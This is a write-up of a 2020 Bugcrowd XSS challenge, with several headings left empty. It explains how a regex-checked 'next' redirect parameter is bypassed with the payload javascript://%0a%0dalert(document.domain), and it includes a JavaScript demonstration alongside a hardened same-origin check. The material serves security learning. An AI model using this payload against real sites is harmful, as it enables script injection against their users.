Bugcrowd & Vullnerability XSS Challenge 2020

“Invalid User”

Iframe successfully added to the DOM.

“Forgot Password”

“Github […]”

JavaScript
HTML
Source code on github.com/nahamsec

“Line Break”

Extract from the profile page
  • It reads the parameter "next" from the URL's query string and stores its value in the variable "get_parameter_next".
  • The value of the parameter "next" is then checked against a certain pattern (a regex).
  • If it matches, the user is redirected to the URL given in the parameter.
  • (n) = any letters, digits and the underscore
  • (x) = any digits, letters and other characters
  • Everything outside the brackets must be present literally and in exactly that order. The parts in brackets are optional.
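The check described above, as an added example that is not the challenge's own code: the regex below is a stand-in built from the description (a run of word characters, then "://", then anything); the challenge's real pattern is not reproduced here, and the host name app.example is assumed. The example shows the payload from the Takeaways passing the naive check, why the line break matters once the browser executes the javascript: URL, and a hardened check that only accepts same-origin http(s) paths.

```javascript
// Added example for this writeup; it is not the challenge's own code.
// ALLOWED_NEXT is a stand-in built from the page's description of the
// pattern (a run of word characters, then "://", then anything); the real
// regex used by the challenge is not reproduced here.
const ALLOWED_NEXT = /^\w+:\/\/.*/;

// The payload given in the writeup's takeaways.
const PAYLOAD = "javascript://%0a%0dalert(document.domain)";

// Mirrors the described behaviour: decode the "next" parameter, test it
// against the pattern, and return the redirect target when it matches.
function naiveNextCheck(rawNext) {
  const decoded = decodeURIComponent(rawNext);
  return ALLOWED_NEXT.test(decoded) ? decoded : null;
}

// Stand-in for what the browser does with location.href = "javascript:...":
// the text after "javascript:" is executed as script. A recording alert()
// and a fake document replace the real browser objects so this runs in Node.
function runJavascriptUrl(jsUrl) {
  if (!jsUrl.toLowerCase().startsWith("javascript:")) return [];
  const body = jsUrl.slice("javascript:".length);
  const calls = [];
  const fakeAlert = (msg) => { calls.push(msg); };
  const fakeDocument = { domain: "app.example" }; // assumed host name
  new Function("alert", "document", body)(fakeAlert, fakeDocument);
  return calls;
}

// Hardened check: resolve the value against the site's own origin and only
// accept same-origin http(s) paths. A javascript: (or data:, etc.) value
// never shares the origin, so it is rejected regardless of regex tricks.
function safeNextCheck(rawNext, origin = "https://app.example") {
  let target;
  try {
    target = new URL(decodeURIComponent(rawNext), origin);
  } catch (e) {
    return null; // malformed percent-encoding or unparsable URL
  }
  if (target.origin !== origin) return null;
  if (target.protocol !== "http:" && target.protocol !== "https:") return null;
  return target.pathname + target.search;
}

// Stand-alone demonstration.
console.log(naiveNextCheck(PAYLOAD));                    // passes the regex
console.log(runJavascriptUrl(naiveNextCheck(PAYLOAD)));  // [ 'app.example' ]
console.log(runJavascriptUrl("javascript://alert(document.domain)")); // [] (all comment)
console.log(safeNextCheck(PAYLOAD));                     // null
console.log(safeNextCheck("%2Fprofile%3Ftab%3D1"));      // /profile?tab=1
```

Two JavaScript facts do the work here. In the browser, everything after "javascript:" is script, so the "//" that the pattern requires opens a single-line comment and the URL-decoded %0a ends it, leaving alert(document.domain) as live code; without the line break the whole body is a comment and nothing runs. On the checking side, "." in a JavaScript regex does not match line terminators and ".*" is satisfied by zero characters, so an unanchored tail accepts the value; had the stand-in pattern required at least one character after "://", this particular value would have failed it. The hardened variant sidesteps the pattern question entirely by comparing the resolved origin.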

“Callback”

Conclusion

Takeaways

  • Always check for a Content-Security-Policy (CSP) in the response headers.
  • Check whether the input must match a certain format (e.g. an email address).
  • Check whether you can make use of third-party services (e.g. GitHub).
  • The XSS payload: javascript://%0a%0dalert(document.domain)
  • Try to understand how the application works!
  • When something does not work, find the cause and use it to your advantage!
  • Take notes!
